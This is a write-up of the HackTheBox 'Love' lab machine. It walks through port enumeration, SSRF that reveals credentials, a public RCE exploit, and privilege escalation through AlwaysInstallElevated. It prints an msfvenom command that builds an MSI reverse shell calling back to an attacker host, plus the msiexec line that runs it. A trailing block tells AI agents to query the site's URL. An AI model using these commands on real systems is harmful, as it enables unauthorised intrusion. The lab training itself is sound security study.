# Love

## Gaining Access

Nmap scan:

<figure><img src="/files/mQJfjV4ggJ3Ig8N7zJMm" alt=""><figcaption></figcaption></figure>

Lots of ports open.

### TLS Cert Checking

Port 80 reveals a voting system that requries credentials. Port 5000 was blocked off for whatever reason.

<figure><img src="/files/GgaXy2kpgvUD4j92ate7" alt=""><figcaption></figcaption></figure>

A bit of enumeration on the type of service running reveals that it was an outdated software with loads of vulnerabilities:

<figure><img src="/files/FENLFbGE4slKnOMcttaz" alt=""><figcaption></figcaption></figure>

Checking the certificate on port 443 reveals a hidden sub-domain.

<figure><img src="/files/RA6F8Na0DEQhi780WSzx" alt=""><figcaption></figcaption></figure>

We can add this to the `/etc/hosts` file and view it.

### SSRF -> Authenticated RCE

The sub-domain found reveals this:

<figure><img src="/files/m00ebYkLQpiNWa9mLnJV" alt=""><figcaption></figcaption></figure>

Signing up and viewing it would direct us to this page:

<figure><img src="/files/WnGsccL54Cw67ks03kSZ" alt=""><figcaption></figcaption></figure>

I was able to get hits on a HTTP server hosted on my machine, but I could not download or execute anything. Since it was the server sending requests, I tried to enter `http://localhost:5000` and was returned this:

<figure><img src="/files/NqqpiaQ5t1EoQJxdCQtd" alt=""><figcaption></figcaption></figure>

With credentials, we now get a shell using an RCE exploit that is publicly available. Just change the settings here:

<figure><img src="/files/ElZqO5tS3nPDvooltAhA" alt=""><figcaption></figcaption></figure>

Then run the exploit:

<figure><img src="/files/MArDdyT0KEmfB3JNmpT9" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### AlwaysInstallElevated

When on the machine, I ran winPEAS to enumerate for me and found that `AlwaysInstallElevated` was set to 1.

<figure><img src="/files/tacqnmoNLYHPV6VpSRjp" alt=""><figcaption></figcaption></figure>

What this exploit allows us to do is execute commands as the Administrator user through `msiexec`. As such, we would first need to generate a quick reverse shell using `msfvenom`.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o rev.msi

# on target
msiexec /quiet /qn /i C:\directory\to\rev.msi
```

Afterwards, we would get a shell as the administrator:

<figure><img src="/files/pvJWrn0xbAsZWGNkKKGG" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/easy/love.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.